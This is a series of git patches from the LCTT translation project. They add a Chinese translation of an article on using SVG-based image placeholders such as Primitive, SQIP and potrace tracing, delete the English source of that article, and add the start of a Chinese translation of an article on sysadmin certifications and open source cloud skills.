15:56:17 +0800 Subject: [PATCH 0088/1627] Translated by qhwdw Translated by qhwdw --- ...lder and Other Image Loading Techniques.md | 238 ++++++++++++++++++ 1 file changed, 238 insertions(+) create mode 100644 translated/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md diff --git a/translated/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md b/translated/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md new file mode 100644 index 0000000000..32c24db6dc --- /dev/null +++ b/translated/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md @@ -0,0 +1,238 @@ +怎么去使用 SVG 作为一个占位符,以及其它图像加载技术 +============================================================ + +![](https://cdn-images-1.medium.com/max/1563/0*zJGl1vKLttcJGIL4.jpg) +从被用作占位符的图像中生成 SVGs。继续阅读! + +我对怎么去让 web 性能更优化和图像加载的更快充满了热情。对这些感兴趣的领域中的其中一项研究就是占位符:当图像还没有被加载的时候应该去展示些什么? + +在前此天,我偶然发现了使用 SVG 的一些加载技术,随后,我将在这篇文章中去描述它。 + +在这篇文章中我们将涉及如下的主题: + +* 不同的占位符类型的概述 + +* 基于 SVG 的占位符(边缘、形状、和轮廓) + +* 自动化处理 + +### 不同的占位符类型的概述 + +以前 [我写的关于占位符和图像延迟加载(lazy-loading)][28] 的文章和 [关于它的讨论][29] 中。当进行一个图像的延迟加载时,一个很好的主意是去考虑提供一个东西作为占位符,因为,它可能会很大程序上影响用户的感知体验。以前我提供了几个选项: + + +![](https://cdn-images-1.medium.com/max/1563/0*jlMM144vAhH-0bEn.png) + +在图像被加载之前,有几种办法去填充图像区域。 + +* 在图像区保持空白:在一个响应式设计的环境中,这种方式防止了内容的跳跃。这种布局从用户体验的角度来看是非常差的作法。但是,它是为了性能的考虑,否则,每次为了获取图像尺寸,浏览器被迫进行布局重计算,以为它留下空间。 + +* 占位符:在那里显示一个用户配置的图像。我们可以在背景上显示一个轮廓。它一直显示直到实际的图像被加载,它也被用于当请求失败或者当用户根本没有设置图像的情况下。这些图像一般都是矢量图,并且都选择尺寸非常小的内联图片。 + +* 固定的颜色:从图像中获取颜色,并将其作为占位符的背景颜色。这可能是主导的颜色,最具活力的 … 这个主意是基于你正在加载的图像,并且它将有助于在没有图像和图像加载完成之间进行平滑过渡。 + +* 模糊的图像:也被称为模糊技术。你提供一个极小版本的图像,然后再去过渡到完整的图像。最初的图像的像素和尺寸是极小的。为去除伪影图像(artifacts the image)被放大和模糊化。我在前面写的 [怎么去做中间的渐进加载的图像][1]、[使用 WebP 去创建极小的预览图像][2]、和 [渐进加载图像的更多示例][3] 中讨论过这方面的内容。 + +结果是,还有其它的更多的变化,并且许多聪明的人开发了其它的创建占位符的技术。 + +其中一个就是用梯度图代替固定的颜色。梯度图可以创建一个更精确的最终图像的预览,它整体上非常小(提升了有效载荷)。 + + +![](https://cdn-images-1.medium.com/max/1250/0*ecPkBAl69ayvRctn.jpg) +使用梯度图作为背景。来自 Gradify 的截屏,它现在并不在线,代码 [在 GitHub][4]。 + +其它的技术是使用基于 SVGs 的技术,它在最近的实验和黑客中得到了一些支持。 + +### 基于 SVG 的占位符 + +我们知道 SVGs 是完美的矢量图像。在大多数情况下我们是希望去加载一个位图,所以,问题是怎么去矢量化一个图像。一些选择是使用边缘、形状和轮廓。 + +#### 边缘 + +在 [前面的文章中][30],我解释了怎么去找出一个图像的边缘和创建一个动画。我最初的目标是去尝试绘制区域,矢量化这个图像,但是,我并不知道该怎么去做到。我意识到使用边缘也可能被创新,并且,我决定去让它们动起来,创建一个 “绘制” 的效果。 + +[在以前,使用边缘检测绘制图像和 SVG 动画,在 SVG 中基本上不被使用和支持的。一段时间以后,我们开始用它去作为一个有趣的替代 … medium.com][31][][32] + +#### 形状 + +SVG 也可以用于去从图像中绘制区域而不是边缘/边界。用这种方法,我们可以矢量化一个位图去创建一个占位符。 + +在以前,我尝试去用三角形做类似的事情。你可以在我的 [at CSSConf][33] 和 [Render Conf][34] 的演讲中看到它。 + + +上面的 codepen 是一个由 245 个三角形组成的基于 SVG 占位符的观点的证明。生成的三角形是使用 [Possan’s polyserver][36] 基于 [Delaunay triangulation][35]。正如预期的那样,使用更多的三角形,文件尺寸就更大。 + +#### Primitive 和 SQIP,一个基于 SVG 的 LQIP 技术 + +Tobias Baldauf 正在致力于另一个使用 SVGs 的被称为 [SQIP][37] 的低质量图像占位符技术。在深入研究 SQIP 之前,我先简单了解一下 [Primitive][38],它是基于 SQIP 的一个库。 + +Primitive 是非常吸引人的,我强烈建议你去了解一下。它讲解了一个位图怎么变成由重叠形状组成的 SVG。它尺寸比较小,一个更小的往返,更适合直接放置到页面中,在一个初始的 HTML 载荷中,它是非常有意义的。 + +Primitive 基于像三角形、长方形、和圆形等形状去生成一个图像。在每一步中它增加一个新形状。很多步之后,图像的结果看起来非常接近原始图像。如果你输出的是 SVG,它意味着输出代码的尺寸将很大。 + +为了理解 Primitive 是怎么工作的,我通过几个图像来跑一下它。我用 10 个形状和 100 个形状来为这个插画生成 SVGs: + + ** 此处有Canvas,请手动处理 ** + +![](https://cdn-images-1.medium.com/max/625/1*y4sr9twkh_WyZh6h0yH98Q.png) + + +![](https://cdn-images-1.medium.com/max/625/1*cqyhYnx83LYvhGdmg2dFDw.png) + +![](https://cdn-images-1.medium.com/max/625/1*qQP5160gPKQdysh0gFnNfw.jpeg) +Processing [this picture][5] 使用 Primitive,使用 [10 个形状][6] 和 [100 形状][7]。 + + +![](https://cdn-images-1.medium.com/max/625/1*PWZLlC4lrLO4CVv1GwR7qA.png) + + + +![](https://cdn-images-1.medium.com/max/625/1*khnga22ldJKOZ2z45Srh8A.png) + + +![](https://cdn-images-1.medium.com/max/625/1*N-20rR7YGFXiDSqIeIyOjA.jpeg) +Processing [this picture][8] 使用 Primitive,使用 [10 形状][9] 和 [100 形状][10]。 + +当在图像中使用 10 个形状时,我们基本构画出了原始图像。在图像环境占位符这里我们使用了 SVG 作为潜在的占位符。实际上,使用 10 个形状的 SVG 代码已经很小了,大约是 1030 字节,当通过 SVGO 传输时,它将下降到 ~640 字节。 + +``` + +``` + +使用 100 个形状生成的图像是很大的,正如我们预期的那样,在 SVGO(之前是 8kB)之后,加权大小为 ~5kB。它们在细节上已经很好了,但是仍然是个很小的载荷。使用多少三角形主要取决于图像类型和细腻程序(如,对比度、颜色数量、复杂度)。 + +它还可能去创建一个类似于 [cpeg-dssim][39] 的脚本,去调整所使用的形状的数量,以满足 [结构相似][40] 的阈值(或者最差情况中的最大数量)。 + +这些 SVG 的结果也可以用作背景图像。因为尺寸约束和矢量化,它们在图像和大规模的背景图像中是很好的选择。 + +#### SQIP + +用 [Tobias 自己的话说][41]: + +> SQIP 是尝试在这两个极端之间找到一种平衡:它使用 [Primitive][42] 去生成一个由几种简单图像构成的近似图像的可见特征的 SVG,使用 [SVGO][43] 去优化 SVG,并且为它增加高斯模糊滤镜。产生的最终的 SVG 占位符加权后大小为 ~800–1000 字节,在屏幕上看起来更为平滑,并提供一个可视的图像内容提示。 + +这个结果和使用一个极小的使用了模糊技术的占位符图像类似。(what [Medium][44] and [other sites][45] do)。区别在于它们使用了一个位图图像,如 JPG 或者 WebP,而这里是使用的占位符是 SVG。 + +如果我们使用 SQIP 而不是原始图像,我们将得到这样的效果: + + +![](https://cdn-images-1.medium.com/max/938/0*yUY1ZFP27vFYgj_o.png) + + + +![](https://cdn-images-1.medium.com/max/938/0*DKoZP7DXFvUZJ34E.png) +[第一张图片][11] 和 [第二张][12] 的输出图像使用了 SQIP。 + +输出的 SVG 是 ~900 字节,并且检查代码,我们可以发现 `feGaussianBlur` 过滤应用到形状组上: + +``` + +``` + +SQIP 也可以输出一个 Base 64 编码的 SVG 内容的图像标签: + +``` + +``` + +#### 轮廓 + +我们刚才看了使用了边缘和 primitive 形状的 SVG。另外一种可能是去矢量化图像以 “tracing” 它们。[Mikael 动画][47] 分享的 [a codepen][48],在几天前展示了怎么去使用两色轮廓作为一个占位符。结果非常漂亮: + + +![](https://cdn-images-1.medium.com/max/1250/1*r6HbVnBkISCQp_UVKjOJKQ.gif) + +SVGs 在这种情况下是手工绘制的,但是,这种技术可以用工具快速生成并自动化处理。 + +* [Gatsby][13],一个 React 支持的描绘 SVGs 的静态网站生成器。它使用 [一个 potrace 算法的 JS 端口][14] 去矢量化图像。 + +* [Craft 3 CMS][15],它也增加了对轮廓的支持。它使用 [一个 potrace 算法的 PHP 端口][16]。 + + +* [image-trace-loader][17],一个使用了 Potrace 算法去处理图像的 Webpack 加载器。 + + +如果感兴趣,可以去看一下 Emil 的 webpack 加载器 (基于 potrace) 和 Mikael 的手工绘制 SVGs 之间的比较。 + + +假设我使用一个默认选项的 potrace 生成输出。但是,有可能对它们进行调整。查看 [the options for image-trace-loader][49],它非常漂亮 [the ones passed down to potrace][50]。 + +### 总结 + +我们看到有不同的工具和技术去从图像中生成 SVGs,并且使用它们作为占位符。与 [WebP 是一个奇妙格式的缩略图][51] 方式相同,SVG 也是一个用于占位符的有趣的格式。我们可以控制细节的级别(和它们的大小),它是高可压缩的,并且很容易用 CSS 和 JS 进行处理。 + +#### 额外的资源 + +这篇文章发表于 [the top of Hacker News][52]。我非常感谢它,并且,在页面上的注释中的其它资源的全部有链接。下面是其中一部分。 + +* [Geometrize][18] 是用 Haxe 写的 Primitive 的一个端口。这个也是,[一个 JS 实现][19],你可以直接 [在你的浏览器上][20]尝试。 + +* [Primitive.js][21],它也是在 JS 中的一个 Primitive 端口,[primitive.nextgen][22],它是使用 Primitive.js 和 Electron 的 Primitive 的桌面版应用的一个端口。 + +* 这里有两个 Twitter 帐户,里面你可以看到一些用 Primitive 和 Geometrize 生成的图像示例。访问 [@PrimitivePic][23] 和 [@Geometrizer][24]。 + +* [imagetracerjs][25],它是在 JavaScript 中的光栅图像跟踪和矢量化程序。这里也有为 [Java][26] 和 [Android][27] 提供的端口。 + +-------------------------------------------------------------------------------- + +via: https://medium.freecodecamp.org/using-svg-as-placeholders-more-image-loading-techniques-bed1b810ab2c + +作者:[ José M. Pérez][a] +译者:[qhwdw](https://github.com/qhwdw) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://medium.freecodecamp.org/@jmperezperez?source=post_header_lockup +[1]:https://medium.com/@jmperezperez/how-medium-does-progressive-image-loading-fd1e4dc1ee3d +[2]:https://medium.com/@jmperezperez/using-webp-to-create-tiny-preview-images-3e9b924f28d6 +[3]:https://medium.com/@jmperezperez/more-examples-of-progressive-image-loading-f258be9f440b +[4]:https://github.com/fraser-hemp/gradify +[5]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square.jpg +[6]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square-10.svg +[7]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square-100.svg +[8]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-618463-square.jpg +[9]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-618463-square-10.svg +[10]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-618463-square-100.svg +[11]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square-sqip.svg +[12]:https://jmperezperez.com/svg-placeholders/%28/assets/images/posts/svg-placeholders/pexels-photo-618463-square-sqip.svg +[13]:https://www.gatsbyjs.org/ +[14]:https://www.npmjs.com/package/potrace +[15]:https://craftcms.com/ +[16]:https://github.com/nystudio107/craft3-imageoptimize/blob/master/src/lib/Potracio.php +[17]:https://github.com/EmilTholin/image-trace-loader +[18]:https://github.com/Tw1ddle/geometrize-haxe +[19]:https://github.com/Tw1ddle/geometrize-haxe-web +[20]:http://www.samcodes.co.uk/project/geometrize-haxe-web/ +[21]:https://github.com/ondras/primitive.js +[22]:https://github.com/cielito-lindo-productions/primitive.nextgen +[23]:https://twitter.com/PrimitivePic +[24]:https://twitter.com/Geometrizer +[25]:https://github.com/jankovicsandras/imagetracerjs +[26]:https://github.com/jankovicsandras/imagetracerjava +[27]:https://github.com/jankovicsandras/imagetracerandroid +[28]:https://medium.com/@jmperezperez/lazy-loading-images-on-the-web-to-improve-loading-time-and-saving-bandwidth-ec988b710290 +[29]:https://www.youtube.com/watch?v=szmVNOnkwoU +[30]:https://medium.com/@jmperezperez/drawing-images-using-edge-detection-and-svg-animation-16a1a3676d3 +[31]:https://medium.com/@jmperezperez/drawing-images-using-edge-detection-and-svg-animation-16a1a3676d3 +[32]:https://medium.com/@jmperezperez/drawing-images-using-edge-detection-and-svg-animation-16a1a3676d3 +[33]:https://jmperezperez.com/cssconfau16/#/45 +[34]:https://jmperezperez.com/renderconf17/#/46 +[35]:https://en.wikipedia.org/wiki/Delaunay_triangulation +[36]:https://github.com/possan/polyserver +[37]:https://github.com/technopagan/sqip +[38]:https://github.com/fogleman/primitive +[39]:https://github.com/technopagan/cjpeg-dssim +[40]:https://en.wikipedia.org/wiki/Structural_similarity +[41]:https://github.com/technopagan/sqip +[42]:https://github.com/fogleman/primitive +[43]:https://github.com/svg/svgo +[44]:https://medium.com/@jmperezperez/how-medium-does-progressive-image-loading-fd1e4dc1ee3d +[45]:https://medium.com/@jmperezperez/more-examples-of-progressive-image-loading-f258be9f440b +[46]:http://www.w3.org/2000/svg +[47]:https://twitter.com/mikaelainalem +[48]:https://codepen.io/ainalem/full/aLKxjm/ +[49]:https://github.com/EmilTholin/image-trace-loader#options +[50]:https://www.npmjs.com/package/potrace#parameters +[51]:https://medium.com/@jmperezperez/using-webp-to-create-tiny-preview-images-3e9b924f28d6 +[52]:https://news.ycombinator.com/item?id=15696596 From c93a8d14aadf66e49d6089e28edc96e2c73414fe Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Thu, 30 Nov 2017 15:57:02 +0800 Subject: [PATCH 0089/1627] Translated by qhwdw Translated by qhwdw --- ...lder and Other Image Loading Techniques.md | 240 ------------------ 1 file changed, 240 deletions(-) delete mode 100644 sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md diff --git a/sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md b/sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md deleted file mode 100644 index 20731a03e4..0000000000 --- a/sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md +++ /dev/null @@ -1,240 +0,0 @@ -Translating by qhwdw -How to use SVG as a Placeholder, and Other Image Loading Techniques -============================================================ - -![](https://cdn-images-1.medium.com/max/1563/0*zJGl1vKLttcJGIL4.jpg) -Generating SVGs from images can be used for placeholders. Keep reading! - -I’m passionate about image performance optimisation and making images load fast on the web. One of the most interesting areas of exploration is placeholders: what to show when the image hasn’t loaded yet. - -During the last days I have come across some loading techniques that use SVG, and I would like to describe them in this post. - -In this post we will go through these topics: - -* Overview of different types of placeholders - -* SVG-based placeholders (edges, shapes and silhouettes) - -* Automating the process. - -### Overview of different types of placeholders - -In the past [I have written about placeholders and lazy-load of images][28], and also [talked about it][29]. When doing lazy-loading of images it’s a good idea to think about what to render as a placeholder, since it can have a big impact in user’s perceived performance. In the past I described several options: - - -![](https://cdn-images-1.medium.com/max/1563/0*jlMM144vAhH-0bEn.png) - -Several strategies to fill the area of an image before it loads. - -* Keeping the space empty for the image: In a world of responsive design, this prevents content from jumping around. Those layout changes are bad from a user’s experience point of view, but also for performance. The browser is forced to do layout re calculations every time it fetches the dimensions of an image, leaving space for it. - -* Placeholder: Imagine that we are displaying a user’s profile image. We might want to display a silhouette in the background. This is shown while the main image is loaded, but also when that request failed or when the user didn’t set any profile picture at all. These images are usually vector-based, and due to their small size are a good candidate to be inlined. - -* Solid colour: Take a colour from the image and use it as the background colour for the placeholder. This can be the dominant colour, the most vibrant… The idea is that it is based on the image you are loading and should help making the transition between no image to image loaded smoother. - -* Blurry image: Also called blur-up technique. You render a tiny version of the image and then transition to the full one. The initial image is tiny both in pixels and kBs. To remove artifacts the image is scaled up and blurred. I have written previously about this on [How Medium does progressive image loading][1], [Using WebP to create tiny preview images][2], and [More examples of Progressive Image Loading][3] . - -Turns out there are many other variations and lots of smart people are developing other techniques to create placeholders. - -One of them is having gradients instead of solid colours. The gradients can create a more accurate preview of the final image, with very little overhead (increase in payload). - - -![](https://cdn-images-1.medium.com/max/1250/0*ecPkBAl69ayvRctn.jpg) -Using gradients as backgrounds. Screenshot from Gradify, which is not online anymore. Code [on GitHub][4]. - -Another technique is using SVGs based on the image, which is getting some traction with recent experiments and hacks. - -### SVG-based placeholders - -We know SVGs are ideal for vector images. In most cases we want to load a bitmap one, so the question is how to vectorise an image. Some options are using edges, shapes and areas. - -#### Edges - -In [a previous post][30] I explained how to find out the edges of an image and create an animation. My initial goal was to try to draw regions, vectorising the image, but I didn’t know how to do it. I realised that using the edges could also be innovative and I decided to animate them creating a “drawing” effect. - -[Drawing images using edge detection and SVG animation -Back in the days SVG was barely used and supported. Some time after we started using them as an alternative to classic…medium.com][31][][32] - -#### Shapes - -SVG can also be used to draw areas from the image instead of edges/borders. In a way, we would vectorise a bitmap image to create a placeholder. - -Back in the days I tried to do something similar with triangles. You can see the result in my talks [at CSSConf][33] and [Render Conf][34]. - - -The codepen above is a proof of concept of a SVG-based placeholder composed of 245 triangles. The generation of the triangles is based on [Delaunay triangulation][35] using [Possan’s polyserver][36]. As expected, the more triangles the SVG uses, the bigger the file size. - -#### Primitive and SQIP, a SVG-based LQIP technique - -Tobias Baldauf has been working on another Low-Quality Image Placeholder technique using SVGs called [SQIP][37]. Before digging into SQIP itself I will give an overview of [Primitive][38], a library on which SQIP is based. - -Primitive is quite fascinating and I definitely recommend you to check it out. It converts a bitmap image into a SVG composed of overlapping shapes. Its small size makes it suitable for inlining it straight into the page. One less roundtrip, and a meaningful placeholder within the initial HTML payload. - -Primitive generates an image based on shapes like triangles, rectangles and circles (and a few others). In every step it adds a new one. The more steps, the resulting image looks closer to the original one. If your output is SVG it also means the size of the output code will be larger. - -In order to understand how Primitive works, I ran it through a couple of images. I generated SVGs for the artwork using 10 shapes and 100 shapes: - - ** 此处有Canvas,请手动处理 ** - -![](https://cdn-images-1.medium.com/max/625/1*y4sr9twkh_WyZh6h0yH98Q.png) - - -![](https://cdn-images-1.medium.com/max/625/1*cqyhYnx83LYvhGdmg2dFDw.png) - -![](https://cdn-images-1.medium.com/max/625/1*qQP5160gPKQdysh0gFnNfw.jpeg) -Processing [this picture][5] using Primitive, using [10 shapes][6] and [100 shapes][7]. - - -![](https://cdn-images-1.medium.com/max/625/1*PWZLlC4lrLO4CVv1GwR7qA.png) - - - -![](https://cdn-images-1.medium.com/max/625/1*khnga22ldJKOZ2z45Srh8A.png) - - -![](https://cdn-images-1.medium.com/max/625/1*N-20rR7YGFXiDSqIeIyOjA.jpeg) -Processing [this picture][8] using Primitive, using [10 shapes][9] and [100 shapes][10]. - -When using 10 shapes the images we start getting a grasp of the original image. In the context of image placeholders there is potential to use this SVG as the placeholder. Actually, the code for the SVG with 10 shapes is really small, around 1030 bytes, which goes down to ~640 bytes when passing the output through SVGO. - -``` - -``` - -The images generated with 100 shapes are larger, as expected, weighting ~5kB after SVGO (8kB before). They have a great level of detail with a still small payload. The decision of how many triangles to use will depend largely on the type of image (eg contrast, amount of colours, complexity) and level of detail. - -It would be possible to create a script similar to [cpeg-dssim][39] that tweaks the amount of shapes used until a [structural similarity][40] threshold is met (or a maximum number of shapes in the worst case). - -These resulting SVGs are great also to use as background images. Being size-constrained and vector-based they are a good candidate for hero images and large backgrounds that otherwise would show artifacts. - -#### SQIP - -In [Tobias’ own words][41]: - -> SQIP is an attempt to find a balance between these two extremes: it makes use of [Primitive][42] to generate a SVG consisting of several simple shapes that approximate the main features visible inside the image, optimizes the SVG using [SVGO][43] and adds a Gaussian Blur filter to it. This produces a SVG placeholder which weighs in at only ~800–1000 bytes, looks smooth on all screens and provides an visual cue of image contents to come. - -The result is similar to using a tiny placeholder image for the blur-up technique (what [Medium][44] and [other sites][45] do). The difference is that instead of using a bitmap image, eg JPG or WebP, the placeholder is SVG. - -If we run SQIP against the original images we’ll get this: - - -![](https://cdn-images-1.medium.com/max/938/0*yUY1ZFP27vFYgj_o.png) - - - -![](https://cdn-images-1.medium.com/max/938/0*DKoZP7DXFvUZJ34E.png) -The output images using SQIP for [the first picture][11] and [the second one][12]. - -The output SVG is ~900 bytes, and inspecting the code we can spot the `feGaussianBlur` filter applied to the group of shapes: - -``` - -``` - -SQIP can also output an image tag with the SVG contents Base 64 encoded: - -``` - -``` - -#### Silhouettes - -We just had a look at using SVGs for edges and primitive shapes. Another possibility is to vectorise the images “tracing” them. [Mikael Ainalem][47] shared [a codepen][48] a few days ago showing how to use a 2-colour silhouette as a placeholder. The result is really pretty: - - -![](https://cdn-images-1.medium.com/max/1250/1*r6HbVnBkISCQp_UVKjOJKQ.gif) - -The SVGs in this case were hand drawn, but the technique quickly spawned integrations with tools to automate the process. - -* [Gatsby][13], a static site generator using React supports these traced SVGs now. It uses [a JS PORT of potrace][14] to vectorise the images. - -* [Craft 3 CMS][15], which also added support for silhouettes. It uses [a PHP port of potrace][16]. - - -* [image-trace-loader][17], a Webpack loader that uses potrace to process the images. - - -It’s also interesting to see a comparison of the output between Emil’s webpack loader (based on potrace) and Mikael’s hand-drawn SVGs. - - -I assume the output generated by potrace is using the default options. However, it’s possible to tweak them. Check [the options for image-trace-loader][49], which are pretty much [the ones passed down to potrace][50]. - -### Summary - -We have seen different tools and techniques to generate SVGs from images and use them as placeholders. The same way [WebP is a fantastic format for thumbnails][51], SVG is also an interesting format to use in placeholders. We can control the level of detail (and thus, size), it’s highly compressible and easy to manipulate with CSS and JS. - -#### Extra Resources - -This post made it to [the top of Hacker News][52]. I’m very grateful for that, and for all the links to other resources that have been shared in the comments on that page. Here are a few of them! - -* [Geometrize][18] is a port of Primitive written in Haxe. There is also [a JS implementation][19] that you can try out directly [on your browser][20]. - -* [Primitive.js][21], which is a port of Primitive in JS. Also, [primitive.nextgen][22], which is a port of the Primitive desktop app using Primitive.js and Electron. - -* There are a couple of Twitter accounts where you can see examples of images generated with Primitive and Geometrize. Check out [@PrimitivePic][23] and [@Geometrizer][24]. - -* [imagetracerjs][25], which is a raster image tracer and vectorizer written in JavaScript. There are also ports for [Java][26] and [Android][27]. - --------------------------------------------------------------------------------- - -via: https://medium.freecodecamp.org/using-svg-as-placeholders-more-image-loading-techniques-bed1b810ab2c - -作者:[ José M. Pérez][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://medium.freecodecamp.org/@jmperezperez?source=post_header_lockup -[1]:https://medium.com/@jmperezperez/how-medium-does-progressive-image-loading-fd1e4dc1ee3d -[2]:https://medium.com/@jmperezperez/using-webp-to-create-tiny-preview-images-3e9b924f28d6 -[3]:https://medium.com/@jmperezperez/more-examples-of-progressive-image-loading-f258be9f440b -[4]:https://github.com/fraser-hemp/gradify -[5]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square.jpg -[6]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square-10.svg -[7]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square-100.svg -[8]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-618463-square.jpg -[9]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-618463-square-10.svg -[10]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-618463-square-100.svg -[11]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square-sqip.svg -[12]:https://jmperezperez.com/svg-placeholders/%28/assets/images/posts/svg-placeholders/pexels-photo-618463-square-sqip.svg -[13]:https://www.gatsbyjs.org/ -[14]:https://www.npmjs.com/package/potrace -[15]:https://craftcms.com/ -[16]:https://github.com/nystudio107/craft3-imageoptimize/blob/master/src/lib/Potracio.php -[17]:https://github.com/EmilTholin/image-trace-loader -[18]:https://github.com/Tw1ddle/geometrize-haxe -[19]:https://github.com/Tw1ddle/geometrize-haxe-web -[20]:http://www.samcodes.co.uk/project/geometrize-haxe-web/ -[21]:https://github.com/ondras/primitive.js -[22]:https://github.com/cielito-lindo-productions/primitive.nextgen -[23]:https://twitter.com/PrimitivePic -[24]:https://twitter.com/Geometrizer -[25]:https://github.com/jankovicsandras/imagetracerjs -[26]:https://github.com/jankovicsandras/imagetracerjava -[27]:https://github.com/jankovicsandras/imagetracerandroid -[28]:https://medium.com/@jmperezperez/lazy-loading-images-on-the-web-to-improve-loading-time-and-saving-bandwidth-ec988b710290 -[29]:https://www.youtube.com/watch?v=szmVNOnkwoU -[30]:https://medium.com/@jmperezperez/drawing-images-using-edge-detection-and-svg-animation-16a1a3676d3 -[31]:https://medium.com/@jmperezperez/drawing-images-using-edge-detection-and-svg-animation-16a1a3676d3 -[32]:https://medium.com/@jmperezperez/drawing-images-using-edge-detection-and-svg-animation-16a1a3676d3 -[33]:https://jmperezperez.com/cssconfau16/#/45 -[34]:https://jmperezperez.com/renderconf17/#/46 -[35]:https://en.wikipedia.org/wiki/Delaunay_triangulation -[36]:https://github.com/possan/polyserver -[37]:https://github.com/technopagan/sqip -[38]:https://github.com/fogleman/primitive -[39]:https://github.com/technopagan/cjpeg-dssim -[40]:https://en.wikipedia.org/wiki/Structural_similarity -[41]:https://github.com/technopagan/sqip -[42]:https://github.com/fogleman/primitive -[43]:https://github.com/svg/svgo -[44]:https://medium.com/@jmperezperez/how-medium-does-progressive-image-loading-fd1e4dc1ee3d -[45]:https://medium.com/@jmperezperez/more-examples-of-progressive-image-loading-f258be9f440b -[46]:http://www.w3.org/2000/svg -[47]:https://twitter.com/mikaelainalem -[48]:https://codepen.io/ainalem/full/aLKxjm/ -[49]:https://github.com/EmilTholin/image-trace-loader#options -[50]:https://www.npmjs.com/package/potrace#parameters -[51]:https://medium.com/@jmperezperez/using-webp-to-create-tiny-preview-images-3e9b924f28d6 -[52]:https://news.ycombinator.com/item?id=15696596 From 22303b5f33c005773aca72a683d005832fe5cc03 Mon Sep 17 00:00:00 2001 From: wangy325 Date: Thu, 30 Nov 2017 21:28:06 +0800 Subject: [PATCH 0090/1627] to be revised. --- ...and Certification Are Key for SysAdmins.md | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 translated/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md diff --git a/translated/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/translated/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md new file mode 100644 index 0000000000..a3b5e95878 --- /dev/null +++ b/translated/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md @@ -0,0 +1,74 @@ + + +开源云技能和认证—系统管理员的核心竞争力 +========= + +![os jobs](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/open-house-sysadmin.jpg?itok=i5FHc3lu "os jobs") + +[2017年开源工作报告][1](以下简称“报告”)显示,具有开源云技术认证的系统管理员能获得更高的薪酬。报告遵守[CC0][2] *[译注1]*许可协议。 + +> 译注1:CC0,即知识/版权共享协议(Creative Commons Zero),任何人都可以不须经作者同意拷贝,修改,发布,甚至商用 + +报告显示53%的受访者认为系统管理员是雇主们最期望被填补的职位空缺之一,因此,具有良好(开源技能/项目经验)的系统管理员能获得更高的薪酬,但这一职位,并没想象中那么容易胜任。 + +一般来讲,系统管理员主要职责是服务器和其他电脑操作系统的安装、服务支持和维护;预防、及时处理服务中断或其他问题的出现。 + +总的来说,今年的报告发现需求最大的领域有开源云(47%),应用开发(44%),大数据(43%),开发运营和安全(42%) + +此外,报告还发现58%的人事经理计划招聘更多的开源专家,其中67%认为开源人才的需求增长会比业内其他领域更甚。那些认为开源人才将成为最大需求的单位招聘的开源人才数量较去年增加了2个百分点。 + +同时,89%的人事经理认为很难找到颇具天赋的开源人才。 + +### 为什么要获取认证 + +报告显示,对系统管理员的需求刺激着人事经理(为53%的组织机构)提供正规的培训和专业技术认证,而这一比例去年为47%。 + +对系统管理方面感兴趣的IT人才应该考虑Linux认证。随便查看几个知名的招聘网站,你就能发现:[CompTIA Linux+][3]认证是入门Linux系统管理员的必备(最高)认证,[红帽认证工程师(RHCE)][4]和[红帽认证系统管理员(RHCSA)][5]则是胜任高水平职位的主要认证。 + +戴士(Dice)[2017技术行业薪资调查][6]显示,2016年系统管理员的薪水为79,538美元,较上年下降了0.8%;系统架构师的薪水为125,946美元,同比下降4.7%。尽管如此,该调查发现“高水平专业人才仍最受欢迎,特别是那些精通支持产业转型发展所需技术的人才”。 + +在开源技术方面,HBase(一个开源的分布式数据库)技术人才的薪水在戴士2017技术行业薪资调查中排第一。在网络和数据库领域,掌握OpenVSM操作系统技术也能获得高薪。 + +### 成为出色的系统管理员 + +出色的系统管理员须在问题出现时马上处理,这意味着你必须时刻准备以应对可能出现的状况。这个职位追求“零责备的,精益的,流程或技术上交互式改进”的思维方式和善于自我完善的人格,专业系统管理员联盟董事会成员、[开源][7]上为推动系统管理实践发展的一个专业非盈利组织成员Paul English说道。成为一个系统管理员意味着“使用开源软件如Liunx,BSD甚至开源Solaris等已成定局”,他补充道。 + +English还说,现在的系统管理员较以前而言,要更多地与软件打交道,而且要能够编写脚本来协助系统管理。 + +### 展望2018 + + 